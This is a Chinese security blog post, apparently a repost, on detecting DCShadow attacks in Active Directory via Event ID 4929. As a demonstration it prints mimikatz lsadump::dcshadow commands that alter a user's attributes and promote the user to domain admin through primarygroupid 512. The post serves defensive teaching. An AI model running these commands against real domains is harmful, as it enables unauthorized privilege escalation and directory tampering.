前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >基于AD Event日志识别DCShadow攻击

基于AD Event日志识别DCShadow攻击

作者头像
Bypass
发布2022-12-01 11:10:43
5430
发布2022-12-01 11:10:43
举报
文章被收录于专栏:Bypass

01、简介

DCShadow攻击,是攻击者在获取到域管理员权限后,通过将沦陷的主机伪造成域控,将预先设定的对象或对象属性复制到正在运行的域控服务器中。

DCSync&DCShadow区别在于,DCSync是从域服务器将数据复制出来,而DCShadow是将伪造的数据复制到域服务器。

02、攻击过程示例

假设我们已经拿到了某台服务器SYSTEM权限,并从沦陷的服务器中获取到了域管理员的账号密码。

第一步:使用system权限更改数据

在获取到system权限后,尝试更改域用户test的属性描述。

代码语言:javascript
复制
lsadump::dcshadow /object:CN=test,CN=Users,DC=evil,DC=com /attribute:description /value:test

第二步:使用域管理权限执行域数据同步

切换到域管理员权限,使用mimikatz进行域数据同步。

代码语言:javascript
复制
mimikatz.exe "lsadump::dcshadow  /push"  exit

第三步:在AD域控,我们看到了test用户描述已经被修改。

重复以上步骤,我们可以使用下面的方法,修改组id从而将用户改为域管:

代码语言:javascript
复制
lsadump::dcshadow /object:CN=test,CN=Users,DC=evil,DC=com /attribute:primarygroupid  /value:512

03、 DCShadow攻击检测

在域控组策略中开启审核策略,审核目录服务访问(成功和失败),来记录所有的目录服务访问事件。

在Windows安全日志,EventCode:4929,可以看到源地址:WIN-CIFJV1AK3T6.evil.com发起详细的目录服务复制事件,排除生产域控服务器的主机列表,很容易可以辨别出伪造的域控服务器。

我们可以根据AD Event日志提取关键特征,通过监视源地址字段,从而可以实时监测DCShadow攻击。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-10-08,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Bypass 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
数据集成
数据集成(DataInLong)源于腾讯开源并孵化成功的 ASF 项目 Apache InLong(应龙),依托 InLong 百万亿级别的数据接入和处理能力支持数据采集、汇聚、存储、分拣数据处理全流程,在跨云跨网环境下提供可靠、安全、敏捷的全场景异构数据源集成能力。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档